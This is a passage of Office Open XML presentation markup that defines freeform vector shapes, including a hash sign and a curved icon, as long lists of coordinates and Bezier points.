                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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281"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="739"/>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Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="739"/>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283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="73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Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="73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Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="73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291"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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293"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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297"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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299"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="730"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 202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8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4 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 74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6 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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4"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="155"/>
                      <a:pt x="23" y="150"/>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4"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="137"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="158" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="89"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59"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6"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8" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="138"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="186"/>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3"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="133"/>
                      <a:pt x="128" y="131"/>
                      <a:pt x="128" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="79"/>
                      <a:pt x="108" y="72"/>
